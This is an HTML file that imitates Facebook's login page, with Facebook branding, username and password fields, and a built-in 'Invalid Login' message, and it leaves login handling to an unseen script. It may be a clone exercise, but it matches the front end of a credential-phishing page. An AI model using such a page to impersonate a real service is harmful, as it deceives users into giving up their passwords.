<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Facebook</title>
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel = "icon" href = "https://img.icons8.com/fluency/50/000000/facebook-new.png" type = "image/x-icon">
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <script src="https://kit.fontawesome.com/48291d9a75.js" crossorigin="anonymous"></script>
    <link href="https://fonts.googleapis.com/css2?family=Hind+Siliguri:wght@500&family=Inter&family=Roboto:wght@500&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="stylemain.css">
</head>
<body>
    <div class="container">
        <div class="name">
            <h1 class="facebook">facebook</h1>
            <h2 class="slogan">Facebook helps you connect and share with the people in your life.</h2>
        </div>
        <div class="login-session">
            <input type="text" class="username" placeholder="Email address or Phone number" id="username">
            <input type="password" class="password" placeholder="Password" id="password">
            <button type="submit" id="login" class="login">Login</button>
            <a href="" class="forgot" id="forgot">Forgotten Password?</a>
            <span class="alert" id="alerting">Invalid Login...!</span>
        </div>
    </div>
    <script src="scriptmain.js"></script>
</body>   